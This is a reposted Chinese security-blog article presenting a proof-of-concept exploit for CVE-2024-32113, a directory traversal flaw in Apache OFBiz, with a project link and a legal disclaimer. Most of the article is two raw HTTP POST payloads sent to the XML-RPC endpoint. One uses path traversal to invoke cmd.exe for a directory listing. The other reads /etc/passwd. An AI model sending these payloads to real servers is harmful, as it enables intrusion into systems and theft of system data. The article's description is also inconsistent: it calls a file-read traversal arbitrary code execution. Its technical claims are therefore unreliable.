CVE-2024-32113:Apache-OFBiz-目录遍历漏洞利用

admin 2024年5月17日17:33:04评论176 views字数 913阅读3分2秒阅读模式

CVE-2024-32113:Apache-OFBiz-目录遍历漏洞利用

介绍

  • CVE-2024-32113 漏洞允许通过发送特制的 HTTP 请求在 Apache OFBiz 服务器上执行任意代码。

  • 在此请求中,攻击者使用参数../../../../../../etc/passwd指向etc/passwdApache OFBiz 服务器上的文件。

  • 当 Apache OFBiz 服务器处理此请求时,它将尝试读取该etc/passwd文件,该文件包含有关服务器上用户的敏感信息。

  • 这些信息可用于对服务器进行进一步的攻击,例如窃取数据、修改数据,甚至删除数据。

POC:

1-

POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall>  <methodName>performCommand</methodName>  <params>    <param>      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:</string></value>    </param>  </params></methodCall>

OR

2-

POST /webtools/control/xmlrpc HTTP/1.1Host: vulnerable-host.comContent-Type: text/xml<?xml version="1.0"?><methodCall>  <methodName>example.createBlogPost</methodName>  <params>    <param>      <value><string>../../../../../../etc/passwd</string></value>    </param>  </params></methodCall>

项目地址:

https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit

原文始发于微信公众号(Ots安全):CVE-2024-32113:Apache-OFBiz-目录遍历漏洞利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月17日17:33:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-32113:Apache-OFBiz-目录遍历漏洞利用https://cn-sec.com/archives/2750570.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息